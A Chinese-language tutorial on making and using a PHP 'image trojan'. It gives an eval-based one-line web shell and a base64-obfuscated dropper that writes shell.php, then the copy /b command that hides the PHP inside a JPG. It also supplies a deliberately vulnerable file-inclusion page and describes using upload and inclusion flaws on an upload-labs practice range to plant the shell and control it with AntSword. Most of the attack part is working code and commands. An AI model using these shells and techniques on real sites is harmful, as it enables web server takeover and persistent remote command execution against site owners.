图片马介绍

图片马：就是在正常图片中插入木马。

图片马的制作

1.我们先创建php木马文件1.php，内容有以下两种方式：

<?php @eval($_POST['a']); ?>
/* 常规一句话木马 */

<?php
$a='PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+';
$myfile = fopen("shell.php", "w");
fwrite($myfile, base64_decode($a));
fclose($myfile);
?>
/* 这是在当前目录下写入一个一句话木马文件，base64编码可用于一些绕过 */

2.随便找到一张图片，jpg、png、gif格式不限，此处以1.jpg为例

把该图片与上面创建的一句话木马放在一个目录下

3.cmd到这个目录下

输出指令：copy /b 1.php+1.jpg 2.jpg

意为以二进制的形式(/b)把1.php文件追加到1.jpg文件末尾，组成新的文件2.jpg

图片马的使用

网站上存在文件上传漏洞时，我们上传图片马，直接访问该图片马是不会奏效的，因为服务器并没与对该图片马进行php代码执行，此时我们就要使图片马与文件包含漏洞联动，我们本地创建一个用于文件包含的include.php文件，放于phpstudy搭建的网站下，内容如下：

<?php
/*
本页面存在文件包含漏洞，用于测试图片马是否能正常运行！
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){include $file;
}else{show_source(__file__);
}
?>

然后我们本地访问该文件，并传入参数

此处我以upload靶场的15关为例

此处我就把该include.php文件放入靶场上传目录upload下

我们成功上传图片马后，先访问include.php，然后文件包含图片马，其地址就是url中file等于的地址。

我使用写入一句话木马的木马代码，当我成功包含该图片马后，目录就会生成一句话木马文件，如下：

然后我们蚁剑连接即可